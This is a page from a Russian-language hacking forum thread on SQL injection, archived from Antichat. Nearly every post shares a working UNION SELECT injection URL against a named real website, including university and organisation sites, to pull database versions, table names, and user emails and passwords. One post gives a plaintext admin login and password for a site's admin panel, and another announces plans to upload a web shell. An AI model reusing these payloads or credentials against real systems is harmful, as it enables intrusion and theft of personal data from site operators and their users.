SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
Page 125 of 798
  1. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    reel-stream.com
    Code:
    http://www.reel-stream.com/headline.php?id=-1+union+select+concat(email,0x3a,password),2,3,4+from+user/*
    пароли в чистом виде
     
    #2481 n1†R0x, 12 Jun 2007
    1 person likes this.
  2. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Вывод всех таблиц
    Code:
    http://opticalnet.ru/articles.phtml?id=-1+union+select+1,table_name,3,4,5+from+information_schema.tables/*
    Хы, какие мы имеем права
    Code:
    http://opticalnet.ru/articles.phtml?id=-1+union+select+1,column_name,3,4,5+from+information_schema.columns+where+table_name='user'+limit+1,50/*
    Сейчас шеллик зальем =)
     
    #2482 banned, 12 Jun 2007
  3. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    www.equipnet.ru
    Code:
    http://www.equipnet.ru/show_firm.php?firm_id=-23638+union+select+convert(concat_ws(0x3b,user(),database(),version())+using+cp1251)/*
     
    #2483 banned, 12 Jun 2007
  4. Barney

    Barney Elder - Старейшина

    Joined:
    11 Jan 2007
    Messages:
    78
    Likes Received:
    19
    Reputations:
    7
    до 15 дошел. дальше не пробовал
    http://astrol.ru/index.php?page=125'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
    хотя как я понял конструкция ордер бай действует так:
    если больше например 15 столбцов - мы получаем корректный ответ. если меньше - ошибку.
    ну вот
    http://astrol.ru/index.php?page=125'+order+by+15/*
     
    #2484 Barney, 12 Jun 2007
  5. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://astrol.ru/index.php?page=125+order+by+7/*
    Code:
    http://astrol.ru/index.php?page=125+order+by+8/*
    при 8 ошибка, значит столбцов меньше, чем 8
    при 7 нет ошибки, значит столбцов 7, логично?

    Code:
    http://astrol.ru/index.php?page=-1+union+select+1,2,3,4,5,6,7/*
    rtfm

    ps: опережая следующий вопрос:
    вывод в 5ку... ошибка при выводе 'version()'
    как выяснилось, несоответствие кодировок.
    http://astrol.ru/index.php?page=-1+union+select+1,2,3,4,convert(version()+using+cp1251),6,7/*
    pps: гм... http://astrol.ru/forum/admin/ инсталляшка Phorum'а)
     
    #2485 n1†R0x, 12 Jun 2007
    Last edited: 12 Jun 2007
    1 person likes this.
  6. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    www.sacr.sk
    Code:
    http://sacr.sk/article?id=-1+union+select+concat_ws(0x3b,user(),database(),version()),2/*&category=&lang=ru
     
    #2486 banned, 12 Jun 2007
  7. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    2Barney
    ну и собственно сам админ
    Code:
    http://astrol.ru/index.php?page=-1+union+select+1,2,3,4,concat(username,char(48),user_password),6,7+from+phpbb_users+limit+1,1/*
     
    #2487 }{0TT@БЬ)Ч, 12 Jun 2007
    2 people like this.
  8. Ky3bMu4

    Ky3bMu4 Elder - Старейшина

    Joined:
    3 Feb 2007
    Messages:
    487
    Likes Received:
    284
    Reputations:
    42
    http://www.databasepublish.com/
    Code:
    http://www.databasepublish.com/news.php?id=-51+union+select+1,version(),user(),4,5,6,7,8,9,10,11+from+users/*
    И даже есть доступ к таблице users! Но password вывадить решительно отказывается. Кидает на index.


    http://www.grid.iu.edu/
    Code:
    http://www.grid.iu.edu/news/news.php?id=-68+union+select+1,2,user(),4,version(),6,7,8/*
    Ну и так, по мелочи:
    Code:
    http://www.insanelygreatmac.com/news.php?id=-3571+union+select+concat(user(),1,version())/*
http://www.simonv.com/music/release.php?id=-78+union+select+concat(user(),version())/*
http://www.kaldor.com/media-release.php?id=-5+union+select+concat(user(),version())/*
     
    #2488 Ky3bMu4, 12 Jun 2007
  9. Aerot1smo

    Aerot1smo Banned

    Joined:
    6 Jul 2006
    Messages:
    73
    Likes Received:
    10
    Reputations:
    -7
    http://canadatype.com/showfont.php?id=-1+union+select+version(),2,3,4,5,6/*
    http://www.big6.com/showenewsarticle.php?id=-1+union+select+version(),2,3,4,5,6,7,8/*
     
    #2489 Aerot1smo, 12 Jun 2007
    Last edited by a moderator: 12 Jun 2007
    1 person likes this.
  10. Серенький

    Серенький Banned

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    sql

    Би-2 (оф. сайт группы)

    http://www.bdva.ru/

    -> версия - пятерка

    названия всех табличек и колонок выводятся без лимита посредством запроса:
    -> есть форум phpbb_users.
    Есть еще табличка, где фигурируют пароли - radio_users
     
    #2490 Серенький, 12 Jun 2007
    2 people like this.
  11. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    www.stanford.edu
    version() - 5
    Code:
    http://www.stanford.edu/group/irepp/cgi-bin/event-detail-popup.php?recordID=-1+union+select+1,concat_ws(0x3b,user(),database(),version()),3,4,5,6,7,8,9,10,11,12/*
    honors.uoregon.edu
    Code:
    http://honors.uoregon.edu/faculty/profiles/index.php?id=-12'+union+select+1,2,3,4,5,concat_ws(0x3b,user(),database(),version()),7,8,9,10,'Mafia%20Of%20Antichat',12,13,14,15,16/*
     
    #2491 banned, 13 Jun 2007
    Last edited: 13 Jun 2007
  12. BromTyZ

    BromTyZ Member

    Joined:
    18 Mar 2007
    Messages:
    6
    Likes Received:
    5
    Reputations:
    0
    Помогите подобрать название таблицы с юзерам(админом) плиз!
    Code:
    http://sexsihop.in.ua/detail.php?detail=-1+union+select+1,2,3,4,5,6,7,8
     
    #2492 BromTyZ, 13 Jun 2007
    Last edited: 13 Jun 2007
    1 person likes this.
  13. Ky3bMu4

    Ky3bMu4 Elder - Старейшина

    Joined:
    3 Feb 2007
    Messages:
    487
    Likes Received:
    284
    Reputations:
    42
    Чёт, сёня не прёт. :( :( :(
    Code:
    http://www.big6.com/showarticle.php?id=-415+union+select+concat(user(),version()),2,3,4,5/*
http://www.pimpsurveys.com/view-survey.php?id=737+union+select+1,user(),version(),database()/* - в самом низу.
     
    #2493 Ky3bMu4, 13 Jun 2007
  14. hitex

    hitex Member

    Joined:
    25 May 2007
    Messages:
    13
    Likes Received:
    11
    Reputations:
    0
    http://www.crim.ncsu.edu/
    Code:
    http://www.crim.ncsu.edu/people_detail.php?id=-343+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x203a20,name,pwd),17+from+user/*
http://www.crim.ncsu.edu/people_detail.php?id=-343+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x203a20,user_login,user_pass),1+from+wp_users+limit+0,2/*
     
    #2494 hitex, 13 Jun 2007
    1 person likes this.
  15. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    Code:
    http://women.unesco.kz/base.php?id=-2+union+select+concat(login,char(58),pwd)+from+users+limit+0,1/*
     
    #2495 _Pantera_, 13 Jun 2007
    3 people like this.
  16. hitex

    hitex Member

    Joined:
    25 May 2007
    Messages:
    13
    Likes Received:
    11
    Reputations:
    0
    Code:
    http://intercar.com.ua/index.php?id=-20+union+select+1,2,concat_ws(0x3b20,user(),database(),version()),4,5,6/*
     
    #2496 hitex, 13 Jun 2007
    1 person likes this.
  17. V.I.P

    V.I.P Elder - Старейшина

    Joined:
    6 Apr 2007
    Messages:
    69
    Likes Received:
    45
    Reputations:
    -6
    Сайт: pec.spb.ru
    http://www.pec.spb.ru/dictionary/?id=-218+union+select+1,concat_ws(char(58),name,password,email),3+from+users+limit+8,1/*
     
    #2497 V.I.P, 13 Jun 2007
    1 person likes this.
  18. Серенький

    Серенький Banned

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    adm

    http://pec.spb.ru/admin/
    login: kos
    pass: s11111

    ---------------------------------------------------------------------------

    http://sexshop.in.ua/detail.php?detail=-1+union+select+1,2,3,concat_ws(0x3a,name,email,icq,phone),5,6,7,8+from+clients+limit+1,1/*
     
    #2498 Серенький, 13 Jun 2007
    Last edited: 13 Jun 2007
    4 people like this.
  19. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Code:
    http://besoch.com/?p=viewsoch&autor=tvardovsky&id=-13+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3/*
    =\
     
    #2499 Constantine, 13 Jun 2007
    1 person likes this.
  20. Aerot1smo

    Aerot1smo Banned

    Joined:
    6 Jul 2006
    Messages:
    73
    Likes Received:
    10
    Reputations:
    -7
    пошу помогите подобрать название таблицы
    http://www.allaboutjazz.com/php/article.php?id=-1+union+sele ct+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80/*
     
    #2500 Aerot1smo, 13 Jun 2007
    1 person likes this.
(You must log in or sign up to post here.)
Page 125 of 798
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.